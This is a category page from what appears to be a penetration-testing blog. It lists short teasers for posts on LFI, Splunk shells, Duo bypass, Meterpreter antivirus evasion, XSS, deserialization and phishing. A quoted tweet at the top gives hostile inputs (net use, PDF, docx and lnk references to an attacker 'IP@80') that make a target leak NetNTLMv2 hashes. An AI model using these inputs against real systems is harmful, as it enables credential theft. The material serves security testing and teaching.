Category: <span>Pentesting</span>

Understanding UNC paths, SMB, and WebDAV

While browsing Twitter recently I came upon a tweet that I found to be very interesting: Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\tor pdf : /F (\\\\IP@80\\t)or dubdoc : ///IP@80/tor doc: Target="file://IP@80/t.dotx"or lnk: URL=file://IP@80/t.htmor: IconFile=\\IP@80\t.ico#RedTeam #NTLM cc @ddouhine — V (@mynameisv__) April 30, 2019 I…


Exploiting Genuitec Secure Delivery Center (SDC) < Version 5.4.7 (Local File Inclusion)

A local file inclusion vulnerability exists in Genuitec Secure Delivery Center (SDC) in versions lower than 5.4.7.  This vulnerability can be exploited to gain admin access to the application. To Exploit the LFI, an attacker can insert a series of “..\”‘s into the URL to move up the directory structure. The attacker will need to…


Popping shells on Splunk

Every now and then when testing networks, I run into Splunk.  Splunk is a software platform to search, analyze and visualize data.  It is super useful for all sorts of purposes.  As a pentester, it can be useful as it often contains all sorts of data, some of which may be sensitive.  Gaining access to…


Dark Tip: Avoiding SSL Inspection on Palo Alto Firewalls

When I stood up a Palo Alto firewall to do research for my blog post on The Dangers of Client Probing on Palo Alto Firewalls, I also found something interesting in the UI.  Under Device -> Certificate Management -> SSL Decryption Exclusion there was a list of domains that by default were exempt from SSL…


Bypassing Duo Two-Factor Authentication (Fail Open)

Often times while performing penetration tests it may be helpful to connect to a system via the Remote Desktop Protocol (RDP). I typically use rdesktop or xfreerdp to connect to host once I have obtained credentials to do all sorts of things such as use Active Directory Users and Computers or SQL Management Studio.  One…


Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus (Part 2)

Cunningham’s Law states “the best way to get the right answer on the internet is not to ask a question; it’s to post the wrong answer.” While I haven’t been the target of any negative feedback, after posting my blog post: Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus, I’ve realized that some…


Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus

Recently I read the article on the Coalfire Blog about executing an obfuscated PowerShell payload using Invoke-CradleCrafter.  This was very useful, as Windows Defender has upped its game lately and is now blocking Metasploit’s Web Delivery module.  I wanted to demonstrate an alternate way to achieve the same goal, with the intention of not dropping…


Microsoft Word upload to Stored XSS

Anytime I find a file upload form I test it.  Best case scenario is that I can upload a reverse shell in a scripting language available on the webserver.  If the application is running in PHP or ASP for example, it becomes quite easy.  If I can’t get a backdoor uploaded, I will attempt to…


Exploiting complex XSS payloads in a constrained parameter

When identifying XSS (Cross-site Scripting) within a target application, I often choose to go beyond a proof-of-concept exploit such as popping an alert box.  I find that the best payloads are those which exploit functionality within the application which require authentication, such as adding a new user when logged in as an administrator.  Other useful…


Bsides Puerto Rico 2017-2018 Presentation

Here are the slides and video from my presentation at Bsides Puerto Rico 2017-2018. Bsides Puerto Rico 2017-2018 from Esteban Rodriguez


Raining shells on Linux environments with Hwacha

If you’ve read previous posts on here you know that I am a big fan of CrackMapExec. One of the things that makes it particularly useful is I can run a payload against multiple targets at once.  A variety of payloads exist, though my favorites are “mimikatz” and “met_inject”, which executes Meterpreter shellcode on a…


Exploiting blind Java deserialization with Burp and Ysoserial

While performing a web application penetration test, I stumbled upon a parameter with some base64 encoded data within a POST parameter. Curious as to what it was, I send it over to Burp decoder.  After two rounds of URL decoding and one round of Base64 decoding, I had what appeared to be a serialized Java…


How to Burp Good

Burp Suite is one of my favorite tools for web application testing. The feature set is rich, and anything that it does not do by default can usually be added with an extension.  There are a few things however, that while they exist in Burp Suite, they are not completely intuitive.  Here are a few…


SSL Phishing with GoPhish and LetsEncrypt

  To achieve a more successful phishing campaign and to protect client credentials in transit, adding an SSL certificate to your phishing pages can a great addition. This guide assumes that you already have GoPhish set up and a phishing domain registered. For detailed instructions on how to set up GoPhish, review their documentation. To…


Exploiting Server Side Include Injection

Recently I was performing a penetration test and came across a Server Side Include injection bug (SSI).  If you are familiar with cross-site scripting (XSS) this type of vulnerability will sound familiar.  This is caused by an application taking input form the user, and supplying it in the response from the server.  The mitigations are…


Exploiting an unsecured Dell Foglight server

  Dell Foglight for Virtualization is an infrastructure performance monitoring tool that can also be used to manage systems as well.  It comes configured with a default username and password of “foglight”. It is possible to execute code on the host itself through an integrated scripting console. By browsing to Homes -> Administration And then…


Phishing with Maldocs

  There are many ways to run a phishing campaign.  The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website.  Running these campaigns are fairly straight forward, and a couple of tools make this…


Squeezing the juice out of a compromised WordPress server

During the course of a penetration test, you may stumble upon a web server running WordPress.  WordPress is a highly popular CMS.  It runs on PHP, and is typically ran on top of a LAMP stack.  While most WordPress servers on the web are configured with strong passwords and security plugins, rarely is this the…


Compromising Synergy clients with a rogue Synergy server

  Synergy is a type of mouse an keyboard sharing software. When configured, moving your mouse off the screen will allow you to control another system that is also set up with Synergy. Below is a YouTube video from Synergy on how it works: The way this works is one host acts as the Synergy…


From OSINT to Internal – Gaining Access from outside the perimeter

                  During an external penetration test, you may be tasked with gaining access from the internet with no knowledge of the a target environment.  After hitting all known servers and web applications with various scanning tools, you have nothing. Searching open source information such as database breaches…